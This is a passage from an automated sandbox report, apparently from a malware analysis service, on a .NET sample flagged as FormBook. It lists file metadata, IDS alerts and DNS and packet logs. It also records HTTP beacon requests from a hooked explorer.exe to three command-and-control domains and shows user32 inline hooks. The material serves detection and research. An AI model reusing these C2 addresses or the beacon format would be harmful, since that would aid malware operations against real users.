                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x7db880x7dc00False0.683504442097data6.69285851481IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x800000x41980x4200False0.244377367424data4.6611198492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x860000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_ICON0x801900x468GLS_BINARY_LSB_FIRST
                                RT_ICON0x805f80x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 4280185157, next used block 4280185157
                                RT_ICON0x816a00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 4280185157, next used block 4280185157
                                RT_GROUP_ICON0x83c480x30data
                                RT_VERSION0x83c780x334data
                                RT_MANIFEST0x83fac0x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyrightDelchamps 2015
                                Assembly Version7.3.0.0
                                InternalNameDebugVi.exe
                                FileVersion7.3.0.0
                                CompanyNameDelchamps
                                LegalTrademarks
                                Comments
                                ProductNamePlatformer_AI
                                ProductVersion7.3.0.0
                                FileDescriptionPlatformer_AI
                                OriginalFilenameDebugVi.exe

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                10/28/21-07:41:15.191108TCP1201ATTACK-RESPONSES 403 Forbidden804978334.102.136.180192.168.2.5
                                10/28/21-07:41:56.621298TCP2031453ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.5109.232.217.55
                                10/28/21-07:41:56.621298TCP2031449ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.5109.232.217.55
                                10/28/21-07:41:56.621298TCP2031412ET TROJAN FormBook CnC Checkin (GET)4979580192.168.2.5109.232.217.55

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 28, 2021 07:41:14.985654116 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.004791975 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:15.005037069 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.005089998 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.024245977 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:15.191107988 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:15.191155910 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:15.191339016 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.191395044 CEST4978380192.168.2.534.102.136.180
                                Oct 28, 2021 07:41:15.210391998 CEST804978334.102.136.180192.168.2.5
                                Oct 28, 2021 07:41:35.426865101 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:35.714111090 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:35.714248896 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:35.714570045 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:35.999416113 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150578976 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150625944 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150654078 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150681019 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150707006 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150728941 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.150736094 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150758982 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.150765896 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150790930 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150805950 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.150819063 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150846004 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.150856972 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.150897026 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.221513033 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435035944 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435070992 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435086966 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435103893 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435115099 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435120106 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435137033 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435138941 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435153961 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435170889 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435177088 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435187101 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435194969 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435204983 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435220957 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435229063 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435237885 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435254097 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435261011 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435271025 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435288906 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435327053 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435331106 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435336113 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435357094 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435389042 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435389042 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435405016 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435420990 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435424089 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435435057 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.435442924 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435461044 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.435478926 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:36.505846024 CEST8049790159.65.10.143192.168.2.5
                                Oct 28, 2021 07:41:36.505939007 CEST4979080192.168.2.5159.65.10.143
                                Oct 28, 2021 07:41:56.565773010 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.620723963 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.621105909 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.621298075 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.676815987 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921601057 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921631098 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921644926 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921662092 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921678066 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921694040 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921710014 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921714067 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.921726942 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921742916 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921758890 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.921760082 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.921780109 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.921808958 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.976444960 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976504087 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976521969 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976537943 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976552963 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976568937 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976584911 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976602077 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976617098 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976634026 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976633072 CEST4979580192.168.2.5109.232.217.55
                                Oct 28, 2021 07:41:56.976650000 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976666927 CEST8049795109.232.217.55192.168.2.5
                                Oct 28, 2021 07:41:56.976778030 CEST4979580192.168.2.5109.232.217.55

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Oct 28, 2021 07:41:14.957154036 CEST6544753192.168.2.58.8.8.8
                                Oct 28, 2021 07:41:14.980756044 CEST53654478.8.8.8192.168.2.5
                                Oct 28, 2021 07:41:35.400157928 CEST6217653192.168.2.58.8.8.8
                                Oct 28, 2021 07:41:35.425120115 CEST53621768.8.8.8192.168.2.5
                                Oct 28, 2021 07:41:56.544334888 CEST6318353192.168.2.58.8.8.8
                                Oct 28, 2021 07:41:56.564491987 CEST53631838.8.8.8192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Oct 28, 2021 07:41:14.957154036 CEST192.168.2.58.8.8.80xebaStandard query (0)www.lifeinformpodcast.comA (IP address)IN (0x0001)
                                Oct 28, 2021 07:41:35.400157928 CEST192.168.2.58.8.8.80x97dcStandard query (0)www.transforming-leadership.comA (IP address)IN (0x0001)
                                Oct 28, 2021 07:41:56.544334888 CEST192.168.2.58.8.8.80xf306Standard query (0)www.diofis.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Oct 28, 2021 07:41:14.980756044 CEST8.8.8.8192.168.2.50xebaNo error (0)www.lifeinformpodcast.comlifeinformpodcast.comCNAME (Canonical name)IN (0x0001)
                                Oct 28, 2021 07:41:14.980756044 CEST8.8.8.8192.168.2.50xebaNo error (0)lifeinformpodcast.com34.102.136.180A (IP address)IN (0x0001)
                                Oct 28, 2021 07:41:35.425120115 CEST8.8.8.8192.168.2.50x97dcNo error (0)www.transforming-leadership.com159.65.10.143A (IP address)IN (0x0001)
                                Oct 28, 2021 07:41:56.564491987 CEST8.8.8.8192.168.2.50xf306No error (0)www.diofis.comdiofis.comCNAME (Canonical name)IN (0x0001)
                                Oct 28, 2021 07:41:56.564491987 CEST8.8.8.8192.168.2.50xf306No error (0)diofis.com109.232.217.55A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.lifeinformpodcast.com
                                • www.transforming-leadership.com
                                • www.diofis.com

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.54978334.102.136.18080C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Oct 28, 2021 07:41:15.005089998 CEST1470OUTGET /rigx/?8pr=9rQH8&1btd7D=sXodP5plw2zuBk5jc17bfKeMRD93SLnVb+AwVzSLCtQvXrT73UIO1hDRl0kooUZyQ/sm HTTP/1.1
                                Host: www.lifeinformpodcast.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Oct 28, 2021 07:41:15.191107988 CEST1471INHTTP/1.1 403 Forbidden
                                Server: openresty
                                Date: Thu, 28 Oct 2021 05:41:15 GMT
                                Content-Type: text/html
                                Content-Length: 275
                                ETag: "61797038-113"
                                Via: 1.1 google
                                Connection: close
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.549790159.65.10.14380C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Oct 28, 2021 07:41:35.714570045 CEST6796OUTGET /rigx/?1btd7D=9134s0FnLt/OWarUedgABr9C/c4q5kSlc0KYi18j8Gti+B07oVRLIxAr1gTintGupYIr&8pr=9rQH8 HTTP/1.1
                                Host: www.transforming-leadership.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Oct 28, 2021 07:41:36.150578976 CEST6797INHTTP/1.1 404 Not Found
                                Date: Thu, 28 Oct 2021 05:41:35 GMT
                                Server: Apache
                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                Cache-Control: no-cache, must-revalidate, max-age=0
                                Link: <https://www.transforming-leadership.com/wp-json/>; rel="https://api.w.org/"
                                Referrer-Policy: no-referrer-when-downgrade
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/html; charset=UTF-8
                                Data Raw: 39 37 65 33 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 41 55 22 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 37 2e 34 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 23 77 65 62 73 69 74 65 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 72 61 6e 73 66 6f 72 6d 69 6e 67 2d 6c 65 61 64 65 72 73 68 69 70 2e 63 6f 6d 2f 22 2c 22 6e 61 6d 65 22 3a 22 54 72 61 6e 73 66 6f 72 6d 69 6e 67 20 4c 65 61 64 65 72 73 68 69 70 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 22 2c 22 70 6f 74 65 6e 74 69 61 6c 41 63 74 69 6f
                                Data Ascii: 97e3<!DOCTYPE html><html class="no-js" lang="en-AU"><head> <meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link rel="pingback" href="http://www.transforming-leadership.com/xmlrpc.php"><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO plugin v17.4 - https://yoast.com/wordpress/plugins/seo/ --><title>Page not found - Transforming Leadership</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found - Transforming Leadership" /><meta property="og:site_name" content="Transforming Leadership" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://www.transforming-leadership.com/#website","url":"https://www.transforming-leadership.com/","name":"Transforming Leadership","description":"","potentialActio


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                2192.168.2.549795109.232.217.5580C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Oct 28, 2021 07:41:56.621298075 CEST6859OUTGET /rigx/?8pr=9rQH8&1btd7D=x7Tu96cHMgTmU7mY47TISrjDcbGhV6G9B99bVm0ZcSL4vblov6CXxXD4o82KDOntdPMV HTTP/1.1
                                Host: www.diofis.com
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Oct 28, 2021 07:41:56.921601057 CEST6860INHTTP/1.1 404 Not Found
                                Connection: close
                                x-powered-by: PHP/7.4.24
                                content-type: text/html; charset=UTF-8
                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                cache-control: no-cache, must-revalidate, max-age=0
                                link: <http://www.diofis.com/wp-json/>; rel="https://api.w.org/"
                                x-litespeed-cache: miss
                                content-length: 33607
                                date: Thu, 28 Oct 2021 05:41:56 GMT
                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 74 72 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 0a 09 3c 21 2d 2d 20 54 68 69 73 20 73 69 74 65 20 69 73 20 6f 70 74 69 6d 69 7a 65 64 20 77 69 74 68 20 74 68 65 20 59 6f 61 73 74 20 53 45 4f 20 70 6c 75 67 69 6e 20 76 31 35 2e 39 2e 32 20 2d 20 68 74 74 70 73 3a 2f 2f 79 6f 61 73 74 2e 63 6f 6d 2f 77 6f 72 64 70 72 65 73 73 2f 70 6c 75 67 69 6e 73 2f 73 65 6f 2f 20 2d 2d 3e 0a 09 3c 74 69 74 6c 65 3e 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 5f 54 52 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 53 61 79 66 61 20 62 75 6c 75 6e 61 6d 61 64 c4 b1 20 2d 20 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 64 69 6f 66 69 73 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 4f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 23 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 2c 22 6e 61 6d 65 22 3a 22 44 69 6f 66 69 73 20 42 65 73 6c 65 6e 6d 65 20 76 65 20 44 69 79 65 74 20 4f 66 69 73 69 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 22 2c 22 73 61 6d 65 41 73 22 3a 5b 5d 2c 22 6c 6f 67 6f 22 3a 7b 22 40 74 79 70 65 22 3a 22 49 6d 61 67 65 4f 62 6a 65 63 74 22 2c 22 40 69 64 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 23 6c 6f 67 6f 22 2c 22 69 6e 4c 61 6e 67 75 61 67 65 22 3a 22 74 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 69 6f 66 69 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 30 2f 30 39 2f 63 72 6f 70 70 65 64 2d 64 69 6f
                                Data Ascii: <!DOCTYPE html><html lang="tr"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1, minimum-scale=1"><link rel="profile" href="http://gmpg.org/xfn/11">... This site is optimized with the Yoast SEO plugin v15.9.2 - https://yoast.com/wordpress/plugins/seo/ --><title>Sayfa bulunamad - diofis</title><meta name="robots" content="noindex, follow" /><meta property="og:locale" content="tr_TR" /><meta property="og:title" content="Sayfa bulunamad - diofis" /><meta property="og:site_name" content="diofis" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"Organization","@id":"http://www.diofis.com/#organization","name":"Diofis Beslenme ve Diyet Ofisi","url":"http://www.diofis.com/","sameAs":[],"logo":{"@type":"ImageObject","@id":"http://www.diofis.com/#logo","inLanguage":"tr","url":"http://www.diofis.com/wp-content/uploads/2020/09/cropped-dio


                                Code Manipulations

                                User Modules

                                Hook Summary

                                Function NameHook TypeActive in Processes
                                PeekMessageAINLINEexplorer.exe
                                PeekMessageWINLINEexplorer.exe
                                GetMessageWINLINEexplorer.exe
                                GetMessageAINLINEexplorer.exe

                                Processes

                                Process: explorer.exe, Module: user32.dll
                                Function NameHook TypeNew Data
                                PeekMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEA
                                PeekMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEA
                                GetMessageWINLINE0x48 0x8B 0xB8 0x86 0x6E 0xEA
                                GetMessageAINLINE0x48 0x8B 0xB8 0x8E 0xEE 0xEA

                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                Analysis Process: MAPO-PI.exe PID: 3868 Parent PID: 5148

                                General

                                Start time:07:40:03
                                Start date:28/10/2021
                                Path:C:\Users\user\Desktop\MAPO-PI.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\Desktop\MAPO-PI.exe'
                                Imagebase:0x70000
                                File size:532992 bytes
                                MD5 hash:C619BBBE3C374C8FD3E9F2C26D087496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
